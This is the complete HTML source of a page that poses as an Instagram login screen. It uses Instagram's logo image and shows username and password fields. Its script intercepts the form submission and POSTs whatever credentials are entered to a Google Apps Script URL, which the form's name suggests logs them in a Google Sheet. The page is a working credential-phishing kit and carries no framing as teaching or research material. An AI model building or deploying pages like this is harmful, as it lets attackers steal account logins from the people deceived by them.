<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="icon" href="">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
</head>
<style type="text/css">
    *{
        padding: 0%;
        margin: 0%;
        box-sizing: border-box;
    }
    section{
        width: 100%;
        height: 100vh;
       
    }
    .main{
    margin-left: auto;
    margin-right: auto;
    width: 360px;
    position: relative;
    top:3%;
    border: 1px solid black;
    display: flex;
    flex-wrap: wrap;
    align-items: center;
    justify-content: center;
    flex-direction: column;
    }
     
    .tick{
        display: flex;
        align-items: flex-start;
        width: 260px;
    }
    .check,.save{
    margin: 3px;
    font-size: 12.9px;
     
    }
  .spa{
    font-size: 14px;
    text-decoration: none;
    color:rgb(87, 87, 250)
}
    .input{
        display: block;
        padding: 6px 2px 6px 2px;
        width: 260px;
        margin: 10px 4px 10px 4px;
    }
   h1{
    text-align: center;
    margin: 30px;
    font-size: 40px;
    font-family:'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif;

 }
   button{
    background-color:rgb(28, 97, 215);
    color:#ffff ;
    border-radius: 10px;
    border:none;
    display: block;
    width: 260px;
    padding: 7px;
    margin: 10px 4px 10px 4px;
   }
   .or{
    margin: 10px 0px 25px;
   }
   p{
    text-align: center;
    margin: 7px 0px 9px 0px;
    font-family: 'Roboto', sans-serif;
    font-size: 16px;
   }
   i{
    color: rgb(37, 37, 236);
    margin: 0px 7px;
   }
   .small{
    font-size: 12px;
    color:rgb(87, 87, 250)
  }

   @media screen and (max-width: 830px){
 .main{
    width: 340px;
    position: relative;
    top:17%;
    
}
section{
    height: 100vh;
}

}
</style>
<body>
    <section>

        <div class="main">
            <h1><i data-visualcompletion="css-img" aria-label="Instagram" class="" role="img" style="background-image: url(&quot;https://static.cdninstagram.com/rsrc.php/v3/yK/r/ATdtiLb2BQ9.png&quot;); background-position: 0px 0px; background-size: 176px 181px; width: 175px; height: 51px; background-repeat: no-repeat; display: inline-block;"></i></h1>
            <form name="submit-to-google-sheet">
            <input type="username"  name="username" placeholder="phone number, username email" class="input" >
            <input type="password"  placeholder="Password"  name="password" class="input">
           <div class="tick"><input class="check" type="checkbox"><p class="save">Save login info</p></div>
<button type="submit" onclick="click()">LoGin</button>
   </form>
 <p class="or">OR</p>
          <p><i class="fa-brands fa-facebook fa-lg"></i>Log in with facebook</p>
          <p class="small">Forgot password?</p>
          <p>Don't have an account?<span ><a href="" target="_blank" class="spa"> Sign up</a><span</p>
          <p>Get the app</p>
        </div>
    </section>



<script type="text/javascript">
   
  const scriptURL = 'https://script.google.com/macros/s/AKfycbzjzsSyDcCXaR5pxKoSFNRxrwnI7JohAKOxwmxd2u9gngX8C7YhlxdbNTbIC-5AIOmI/exec'
  const form = document.forms['submit-to-google-sheet']

  form.addEventListener('submit', e => {
    e.preventDefault()
    fetch(scriptURL, { method: 'POST', body: new FormData(form)})
      .then(response => console.log('Success!', response))
      .catch(error => console.error('Error!', error.message))
  })
</script>

</body>
</html>